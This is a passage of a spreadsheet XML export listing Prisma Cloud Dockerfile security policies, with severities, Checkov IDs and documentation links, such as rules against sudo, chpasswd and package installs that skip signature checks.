        <is>
          <t>3d2a05e1-6a04-49ff-bafc-f0a3e921d4e1</t>
        </is>
      </c>
      <c r="AI660" t="inlineStr"/>
      <c r="AJ660" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK660" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="661">
      <c r="A661" t="inlineStr"/>
      <c r="B661" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C661" s="2" t="inlineStr"/>
      <c r="D661" t="inlineStr"/>
      <c r="E661" t="inlineStr"/>
      <c r="F661" t="inlineStr"/>
      <c r="G661" t="b">
        <v>1</v>
      </c>
      <c r="H6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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J661" t="inlineStr">
        <is>
          <t>IaC:General</t>
        </is>
      </c>
      <c r="K661" t="inlineStr">
        <is>
          <t>A user for the container has not been created</t>
        </is>
      </c>
      <c r="L661" t="inlineStr"/>
      <c r="M661" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N661" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O661" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P661" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q661" t="inlineStr"/>
      <c r="R661" t="inlineStr"/>
      <c r="S661" t="inlineStr"/>
      <c r="T661" t="b">
        <v>0</v>
      </c>
      <c r="U661" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V661" t="inlineStr">
        <is>
          <t>IaC:General</t>
        </is>
      </c>
      <c r="W661" t="inlineStr">
        <is>
          <t>Ensure that a user for the container has been created</t>
        </is>
      </c>
      <c r="X661" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-that-a-user-for-the-container-has-been-created</t>
        </is>
      </c>
      <c r="Y661" t="inlineStr"/>
      <c r="Z661" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA661" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB661" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC661" t="inlineStr">
        <is>
          <t>CKV_DOCKER_3</t>
        </is>
      </c>
      <c r="AD661" t="b">
        <v>1</v>
      </c>
      <c r="AE661" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF661" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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1" t="inlineStr">
        <is>
          <t>54c9568e-e0c1-4686-828d-b60dc8e456f8</t>
        </is>
      </c>
      <c r="AI661" t="inlineStr"/>
      <c r="AJ661" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK661" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="662">
      <c r="A662" t="inlineStr"/>
      <c r="B662" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C662" s="2" t="inlineStr"/>
      <c r="D662" t="inlineStr"/>
      <c r="E662" t="inlineStr"/>
      <c r="F662" t="inlineStr"/>
      <c r="G662" t="b">
        <v>1</v>
      </c>
      <c r="H6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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J662" t="inlineStr">
        <is>
          <t>IaC:General</t>
        </is>
      </c>
      <c r="K662" t="inlineStr">
        <is>
          <t>Buildtime resource is not deployed to Azure runtime environments</t>
        </is>
      </c>
      <c r="L662" t="inlineStr"/>
      <c r="M662" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N662" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O662" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P662" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q662" t="inlineStr"/>
      <c r="R662" t="inlineStr"/>
      <c r="S662" t="inlineStr"/>
      <c r="T662" t="b">
        <v>0</v>
      </c>
      <c r="U662" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V662" t="inlineStr">
        <is>
          <t>IaC:General</t>
        </is>
      </c>
      <c r="W662" t="inlineStr">
        <is>
          <t>Ensure all buildtime resources are deployed to cloud runtime environments</t>
        </is>
      </c>
      <c r="X662" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/content-collections/application-security/risk-management/monitor-and-manage-code-build/unused-resources</t>
        </is>
      </c>
      <c r="Y662" t="inlineStr"/>
      <c r="Z662" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA662" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB662" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC662" t="inlineStr"/>
      <c r="AD662" t="b">
        <v>1</v>
      </c>
      <c r="AE662" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF662" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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2" t="inlineStr">
        <is>
          <t>2ecb2073-46db-46eb-938e-05282e024fef</t>
        </is>
      </c>
      <c r="AI662" t="inlineStr"/>
      <c r="AJ662" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK662" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="663">
      <c r="A663" t="inlineStr"/>
      <c r="B663" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C663" s="2" t="inlineStr"/>
      <c r="D663" t="inlineStr"/>
      <c r="E663" t="inlineStr"/>
      <c r="F663" t="inlineStr"/>
      <c r="G663" t="b">
        <v>1</v>
      </c>
      <c r="H6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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J663" t="inlineStr">
        <is>
          <t>IaC:General</t>
        </is>
      </c>
      <c r="K663" t="inlineStr">
        <is>
          <t>Buildtime resource is not deployed to GCP runtime environments</t>
        </is>
      </c>
      <c r="L663" t="inlineStr"/>
      <c r="M663" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N663" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O663" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P663" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q663" t="inlineStr"/>
      <c r="R663" t="inlineStr"/>
      <c r="S663" t="inlineStr"/>
      <c r="T663" t="b">
        <v>0</v>
      </c>
      <c r="U663" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V663" t="inlineStr">
        <is>
          <t>IaC:General</t>
        </is>
      </c>
      <c r="W663" t="inlineStr">
        <is>
          <t>Ensure all buildtime resources are deployed to cloud runtime environments</t>
        </is>
      </c>
      <c r="X663" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/content-collections/application-security/risk-management/monitor-and-manage-code-build/unused-resources</t>
        </is>
      </c>
      <c r="Y663" t="inlineStr"/>
      <c r="Z663" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["*"]}</t>
        </is>
      </c>
      <c r="AA663" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB663" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC663" t="inlineStr"/>
      <c r="AD663" t="b">
        <v>1</v>
      </c>
      <c r="AE663" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF663" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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3" t="inlineStr">
        <is>
          <t>4ab9e3f4-96d5-4d51-8ce6-f2be13df99f4</t>
        </is>
      </c>
      <c r="AI663" t="inlineStr"/>
      <c r="AJ663" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK663" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="664">
      <c r="A664" t="inlineStr"/>
      <c r="B664" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C664" s="2" t="inlineStr"/>
      <c r="D664" t="inlineStr"/>
      <c r="E664" t="inlineStr"/>
      <c r="F664" t="inlineStr"/>
      <c r="G664" t="b">
        <v>1</v>
      </c>
      <c r="H6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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J664" t="inlineStr">
        <is>
          <t>IaC:General:</t>
        </is>
      </c>
      <c r="K664" t="inlineStr">
        <is>
          <t>Dockerfile APT package manager is configured to force package installations without prompts or verifications</t>
        </is>
      </c>
      <c r="L664" t="inlineStr"/>
      <c r="M664" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N664" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O664" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P664" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q664" t="inlineStr"/>
      <c r="R664" t="inlineStr"/>
      <c r="S664" t="inlineStr"/>
      <c r="T664" t="b">
        <v>0</v>
      </c>
      <c r="U664" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V664" t="inlineStr">
        <is>
          <t>IaC:General:</t>
        </is>
      </c>
      <c r="W664" t="inlineStr">
        <is>
          <t>Ensure that the '--force-yes' option is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state</t>
        </is>
      </c>
      <c r="X664" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-force</t>
        </is>
      </c>
      <c r="Y664" t="inlineStr"/>
      <c r="Z664" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA664" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB664" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC664" t="inlineStr">
        <is>
          <t>CKV2_DOCKER_11</t>
        </is>
      </c>
      <c r="AD664" t="b">
        <v>1</v>
      </c>
      <c r="AE664" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF664" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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4" t="inlineStr">
        <is>
          <t>50051b94-5c09-4f3b-bf19-b82f9d8ae6b6</t>
        </is>
      </c>
      <c r="AI664" t="inlineStr"/>
      <c r="AJ664" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK664" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="665">
      <c r="A665" t="inlineStr"/>
      <c r="B665" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C665" s="2" t="inlineStr"/>
      <c r="D665" t="inlineStr"/>
      <c r="E665" t="inlineStr"/>
      <c r="F665" t="inlineStr"/>
      <c r="G665" t="b">
        <v>1</v>
      </c>
      <c r="H6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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J665" t="inlineStr">
        <is>
          <t>IaC:General:</t>
        </is>
      </c>
      <c r="K665" t="inlineStr">
        <is>
          <t>Docker WORKDIR values are not absolute paths</t>
        </is>
      </c>
      <c r="L665" t="inlineStr"/>
      <c r="M665" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N665" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O665" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P665" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q665" t="inlineStr"/>
      <c r="R665" t="inlineStr"/>
      <c r="S665" t="inlineStr"/>
      <c r="T665" t="b">
        <v>0</v>
      </c>
      <c r="U665" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V665" t="inlineStr">
        <is>
          <t>IaC:General:</t>
        </is>
      </c>
      <c r="W665" t="inlineStr">
        <is>
          <t>Ensure that WORKDIR values are absolute paths</t>
        </is>
      </c>
      <c r="X665" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-workdir-values-are-absolute-paths</t>
        </is>
      </c>
      <c r="Y665" t="inlineStr"/>
      <c r="Z665" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA665" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB665" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC665" t="inlineStr">
        <is>
          <t>CKV_DOCKER_10</t>
        </is>
      </c>
      <c r="AD665" t="b">
        <v>1</v>
      </c>
      <c r="AE665" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF665" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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5" t="inlineStr">
        <is>
          <t>3b5a51c0-9b3d-4cc2-be84-18e6ac4aba1b</t>
        </is>
      </c>
      <c r="AI665" t="inlineStr"/>
      <c r="AJ665" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK665" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="666">
      <c r="A666" t="inlineStr"/>
      <c r="B666" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C666" s="2" t="inlineStr"/>
      <c r="D666" t="inlineStr"/>
      <c r="E666" t="inlineStr"/>
      <c r="F666" t="inlineStr"/>
      <c r="G666" t="b">
        <v>1</v>
      </c>
      <c r="H6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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J666" t="inlineStr">
        <is>
          <t>IaC:General:</t>
        </is>
      </c>
      <c r="K666" t="inlineStr">
        <is>
          <t>Dockerfile RPM package manager is configured to skip package signature checks</t>
        </is>
      </c>
      <c r="L666" t="inlineStr"/>
      <c r="M666" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N666" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O666" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P666" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q666" t="inlineStr"/>
      <c r="R666" t="inlineStr"/>
      <c r="S666" t="inlineStr"/>
      <c r="T666" t="b">
        <v>0</v>
      </c>
      <c r="U666" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V666" t="inlineStr">
        <is>
          <t>IaC:General:</t>
        </is>
      </c>
      <c r="W666" t="inlineStr">
        <is>
          <t>Ensure that packages with untrusted or missing signatures are not used by rpm via the '--nodigest', '--nosignature', '--noverify', or '--nofiledigest' options</t>
        </is>
      </c>
      <c r="X666" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-rpm-signed</t>
        </is>
      </c>
      <c r="Y666" t="inlineStr"/>
      <c r="Z666" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA666" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB666" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC666" t="inlineStr">
        <is>
          <t>CKV2_DOCKER_10</t>
        </is>
      </c>
      <c r="AD666" t="b">
        <v>1</v>
      </c>
      <c r="AE666" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF666" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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6" t="inlineStr">
        <is>
          <t>ef703177-17a5-4316-b195-5a97fbd8bee9</t>
        </is>
      </c>
      <c r="AI666" t="inlineStr"/>
      <c r="AJ666" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK666" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="667">
      <c r="A667" t="inlineStr"/>
      <c r="B667" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C667" s="2" t="inlineStr"/>
      <c r="D667" t="inlineStr"/>
      <c r="E667" t="inlineStr"/>
      <c r="F667" t="inlineStr"/>
      <c r="G667" t="b">
        <v>1</v>
      </c>
      <c r="H6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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J667" t="inlineStr">
        <is>
          <t>IaC:General:</t>
        </is>
      </c>
      <c r="K667" t="inlineStr">
        <is>
          <t>'chpasswd' is used to set or remove passwords</t>
        </is>
      </c>
      <c r="L667" t="inlineStr"/>
      <c r="M667" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N667" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O667" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P667" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q667" t="inlineStr"/>
      <c r="R667" t="inlineStr"/>
      <c r="S667" t="inlineStr"/>
      <c r="T667" t="b">
        <v>0</v>
      </c>
      <c r="U667" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V667" t="inlineStr">
        <is>
          <t>IaC:General:</t>
        </is>
      </c>
      <c r="W667" t="inlineStr">
        <is>
          <t>Ensure that 'chpasswd' is not used to set or remove passwords</t>
        </is>
      </c>
      <c r="X667" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/bc-docker-2-17</t>
        </is>
      </c>
      <c r="Y667" t="inlineStr"/>
      <c r="Z667" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA667" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB667" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC667" t="inlineStr">
        <is>
          <t>CKV2_DOCKER_17</t>
        </is>
      </c>
      <c r="AD667" t="b">
        <v>1</v>
      </c>
      <c r="AE667" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF667" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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7" t="inlineStr">
        <is>
          <t>0b7074cc-6374-48e1-af28-9d6c07de3fc9</t>
        </is>
      </c>
      <c r="AI667" t="inlineStr"/>
      <c r="AJ667" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK667" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="668">
      <c r="A668" t="inlineStr"/>
      <c r="B668" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C668" s="2" t="inlineStr"/>
      <c r="D668" t="inlineStr"/>
      <c r="E668" t="inlineStr"/>
      <c r="F668" t="inlineStr"/>
      <c r="G668" t="b">
        <v>1</v>
      </c>
      <c r="H6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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J668" t="inlineStr">
        <is>
          <t>IaC:General:</t>
        </is>
      </c>
      <c r="K668" t="inlineStr">
        <is>
          <t>Dockerfile APT package manager is configured to allow unauthenticated packages</t>
        </is>
      </c>
      <c r="L668" t="inlineStr"/>
      <c r="M668" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N668" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O668" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P668" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q668" t="inlineStr"/>
      <c r="R668" t="inlineStr"/>
      <c r="S668" t="inlineStr"/>
      <c r="T668" t="b">
        <v>0</v>
      </c>
      <c r="U668" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V668" t="inlineStr">
        <is>
          <t>IaC:General:</t>
        </is>
      </c>
      <c r="W668" t="inlineStr">
        <is>
          <t>Ensure that packages with untrusted or missing signatures are not used by apt-get via the '--allow-unauthenticated' option</t>
        </is>
      </c>
      <c r="X668" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-authenticated</t>
        </is>
      </c>
      <c r="Y668" t="inlineStr"/>
      <c r="Z668" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA668" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB668" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC668" t="inlineStr">
        <is>
          <t>CKV2_DOCKER_8</t>
        </is>
      </c>
      <c r="AD668" t="b">
        <v>1</v>
      </c>
      <c r="AE668" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF668" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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8" t="inlineStr">
        <is>
          <t>f539f6d1-6bdd-4da3-afd6-5bc5213db8b3</t>
        </is>
      </c>
      <c r="AI668" t="inlineStr"/>
      <c r="AJ668" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK668" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="669">
      <c r="A669" t="inlineStr"/>
      <c r="B669" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C669" s="2" t="inlineStr"/>
      <c r="D669" t="inlineStr"/>
      <c r="E669" t="inlineStr"/>
      <c r="F669" t="inlineStr"/>
      <c r="G669" t="b">
        <v>1</v>
      </c>
      <c r="H6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69" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J669" t="inlineStr">
        <is>
          <t>IaC:General:</t>
        </is>
      </c>
      <c r="K669" t="inlineStr">
        <is>
          <t>Dockerfile contains the use of 'sudo'</t>
        </is>
      </c>
      <c r="L669" t="inlineStr"/>
      <c r="M669" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N669" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O669" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P669" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q669" t="inlineStr"/>
      <c r="R669" t="inlineStr"/>
      <c r="S669" t="inlineStr"/>
      <c r="T669" t="b">
        <v>0</v>
      </c>
      <c r="U669" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V669" t="inlineStr">
        <is>
          <t>IaC:General:</t>
        </is>
      </c>
      <c r="W669" t="inlineStr">
        <is>
          <t>Ensure that sudo isn't used</t>
        </is>
      </c>
      <c r="X669" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-dont-use-sudo</t>
        </is>
      </c>
      <c r="Y669" t="inlineStr"/>
      <c r="Z669" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA669" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB669" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC669" t="inlineStr">
        <is>
          <t>CKV2_DOCKER_1</t>
        </is>
      </c>
      <c r="AD669" t="b">
        <v>1</v>
      </c>
      <c r="AE669" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF669" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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69" t="inlineStr">
        <is>
          <t>0c700d9f-3cb7-4143-b4d6-f3a64ee5b359</t>
        </is>
      </c>
      <c r="AI669" t="inlineStr"/>
      <c r="AJ669" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK669" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="670">
      <c r="A670" t="inlineStr"/>
      <c r="B670" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C670" s="2" t="inlineStr"/>
      <c r="D670" t="inlineStr"/>
      <c r="E670" t="inlineStr"/>
      <c r="F670" t="inlineStr"/>
      <c r="G670" t="b">
        <v>1</v>
      </c>
      <c r="H6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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J670" t="inlineStr">
        <is>
          <t>IaC:General:</t>
        </is>
      </c>
      <c r="K670" t="inlineStr">
        <is>
          <t>Dockerfile APK package manager is configured to allow untrusted repositories</t>
        </is>
      </c>
      <c r="L670" t="inlineStr"/>
      <c r="M670" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N670" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O670" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P670" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q670" t="inlineStr"/>
      <c r="R670" t="inlineStr"/>
      <c r="S670" t="inlineStr"/>
      <c r="T670" t="b">
        <v>0</v>
      </c>
      <c r="U670" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V670" t="inlineStr">
        <is>
          <t>IaC:General:</t>
        </is>
      </c>
      <c r="W670" t="inlineStr">
        <is>
          <t>Ensure that packages with untrusted or missing signatures are not used by apk via the '--allow-untrusted' option</t>
        </is>
      </c>
      <c r="X670" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apk-trusted</t>
        </is>
      </c>
      <c r="Y670" t="inlineStr"/>
      <c r="Z670" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA670" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB670" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC670" t="inlineStr">
        <is>
          <t>CKV2_DOCKER_7</t>
        </is>
      </c>
      <c r="AD670" t="b">
        <v>1</v>
      </c>
      <c r="AE670" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF670" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG6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0" t="inlineStr">
        <is>
          <t>59b11f46-20d8-4f88-bf54-8f31c795d8b1</t>
        </is>
      </c>
      <c r="AI670" t="inlineStr"/>
      <c r="AJ670" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK670" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="671">
      <c r="A671" t="inlineStr"/>
      <c r="B671" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C671" s="2" t="inlineStr"/>
      <c r="D671" t="inlineStr"/>
      <c r="E671" t="inlineStr"/>
      <c r="F671" t="inlineStr"/>
      <c r="G671" t="b">
        <v>1</v>
      </c>
      <c r="H6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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J671" t="inlineStr">
        <is>
          <t>IaC:General:</t>
        </is>
      </c>
      <c r="K671" t="inlineStr">
        <is>
          <t>Dockerfile YUM package manager is configured to skip GPG signature checks</t>
        </is>
      </c>
      <c r="L671" t="inlineStr"/>
      <c r="M671" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N671" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O671" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P671" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q671" t="inlineStr"/>
      <c r="R671" t="inlineStr"/>
      <c r="S671" t="inlineStr"/>
      <c r="T671" t="b">
        <v>0</v>
      </c>
      <c r="U671" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V671" t="inlineStr">
